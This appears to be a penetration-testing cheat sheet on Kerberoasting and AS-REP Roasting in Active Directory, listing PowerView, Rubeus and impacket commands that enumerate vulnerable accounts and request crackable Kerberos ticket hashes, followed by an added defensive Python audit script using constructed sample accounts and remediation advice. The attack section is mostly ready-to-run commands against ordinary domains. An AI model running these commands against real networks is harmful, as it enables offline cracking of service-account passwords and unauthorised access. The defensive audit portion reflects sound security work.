
Kerberos Attacks

Kerberoasting

Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. The attack requires a valid domain user account and password.

Vulnerability detection

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser -SPN

Windows

PowerView

Import-Module .\PowerView.ps1
Invoke-Kerberoast

Rubeus

.\Rubeus.exe kerberoast /nowrap

Linux

impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass

AS-REP Roasting

AS-REP Roasting targets accounts that have the "Do not require Kerberos preauthentication" option set.

Windows

  • Manual (Get-ADUser, ActiveDirectory module)
Get-ADUser -Filter * -Properties DoesNotRequirePreAuth | Where-Object {$_.DoesNotRequirePreAuth -eq $true -and $_.Enabled -eq $true} | Select-Object Name
  • PowerView Auto
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
  • Rubeus
.\Rubeus.exe asreproast /user:full.name /domain:domain.local /dc:dc01.domain.local

Linux

impacket-GetNPUsers domain.local/ -no-pass -request -k -usersfile users.txt
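
Defender-side audit covering both the Kerberoasting and AS-REP Roasting conditions above, as an added example that is not part of the original page or of any tool named on it. It decodes userAccountControl and msDS-SupportedEncryptionTypes from a directory export; the account records are constructed sample data, and treating an unset encryption-type attribute as RC4-capable is an assumption about the domain default.

```python
# Added example: flag enabled accounts exposed to Kerberoasting / AS-REP Roasting.
# All records in SAMPLE_USERS are constructed, not taken from a real domain.
ACCOUNTDISABLE = 0x0002       # userAccountControl: account disabled
DONT_REQ_PREAUTH = 0x400000   # userAccountControl: pre-authentication not required
RC4_HMAC = 0x4                # msDS-SupportedEncryptionTypes: RC4
AES_MASK = 0x8 | 0x10         # msDS-SupportedEncryptionTypes: AES128 | AES256

SAMPLE_USERS = [  # constructed sample export
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200,
     "servicePrincipalName": ["MSSQLSvc/db01.domain.local:1433"],
     "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x200,
     "servicePrincipalName": ["HTTP/web01.domain.local"],
     "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "legacy.app",
     "userAccountControl": 0x200 | DONT_REQ_PREAUTH},
    {"sAMAccountName": "old.svc",
     "userAccountControl": 0x200 | ACCOUNTDISABLE | DONT_REQ_PREAUTH,
     "servicePrincipalName": ["HTTP/old01.domain.local"]},
    {"sAMAccountName": "full.name", "userAccountControl": 0x200},
]


def audit(users):
    """Return (account, exposure, detail) tuples for enabled accounts."""
    findings = []
    for u in users:
        uac = u.get("userAccountControl", 0)
        if uac & ACCOUNTDISABLE:
            continue  # skipped, mirroring the Enabled filter used above
        name = u["sAMAccountName"]
        if u.get("servicePrincipalName"):
            enc = u.get("msDS-SupportedEncryptionTypes", 0)
            # Assumption: unset/0 falls back to a domain default that permits RC4.
            rc4 = enc == 0 or bool(enc & RC4_HMAC) or not (enc & AES_MASK)
            findings.append((name, "kerberoastable",
                             "rc4-allowed" if rc4 else "aes-only"))
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "asrep-roastable", "preauth-disabled"))
    return findings


if __name__ == "__main__":
    for account, exposure, detail in audit(SAMPLE_USERS):
        print(f"{account:12} {exposure:16} {detail}")
```

Accounts reported as rc4-allowed or preauth-disabled are the ones to prioritise for long random passwords, AES-only encryption types, or re-enabling pre-authentication.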